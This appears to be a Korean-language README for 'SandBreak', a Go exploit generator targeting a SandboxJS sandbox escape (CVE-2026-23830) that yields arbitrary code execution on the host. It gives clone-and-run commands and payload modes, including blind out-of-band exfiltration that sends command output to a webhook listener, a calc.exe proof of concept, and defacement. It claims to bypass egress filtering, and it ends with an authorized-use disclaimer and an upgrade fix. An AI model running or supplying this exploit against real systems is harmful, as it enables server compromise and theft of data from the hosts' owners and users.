
CVE-2026-23830(SandboxJS 이스케이프)에 대한 익스플로잇 페이로드를 생성 및 전달하며, 블라인드 OOB 외부 유출 및 로컬 calc PoC 모드를 지원합니다. HTTP/HTTPS 리스너를 지원하며 축소된 JavaScript 페이로드를 생성합니다.
SandBreak는 **SandboxJS 탈출 취약점(CVE-2026-23830)**을 활용하도록 설계된 강력한 Go 기반 익스플로잇 생성기입니다.
이 도구는 이전 버전의 sandboxjs에서 보호되지 않는 AsyncFunction 생성자를 악용하여 공격자가 V8 샌드박스 환경을 벗어나 호스트 시스템에서 임의 코드를 실행할 수 있게 합니다. Blind OOB Exfiltration, Defacement, Error-Based RCE를 포함한 여러 페이로드 모드를 지원합니다.
oob: 블라인드 시나리오를 위한 대역외 데이터 유출(HTTP/HTTPS).calc: calc.exe 실행(클래식 PoC).리포지토리를 클론하고 실행하세요:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
출력 피드백이 없을 때 사용합니다. 명령을 실행하고 Base64로 인코딩된 결과를 리스너(예: webhook.site)로 전송합니다.
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
네트워크 오류를 처리하여 기본적인 이그레스 필터링 충돌을 성공적으로 우회합니다.
Windows 서버에서 계산기를 실행합니다.
go run CVE-2026-23830.go -mode calc
사이트에 시각적 출력이 없음에도 불구하고 공격자가 Webhook을 통해 서버의 사용자 데이터를 수신하는 모습.
이 도구는 교육 목적 및 승인된 침투 테스트를 위해서만 제작되었습니다.
AsyncFunction 생성자가 제대로 샌드박싱된 최신 버전으로 sandboxjs를 업그레이드하세요.
npm update sandboxjs
작성자: Meysam Bal-afkan
라이선스: MIT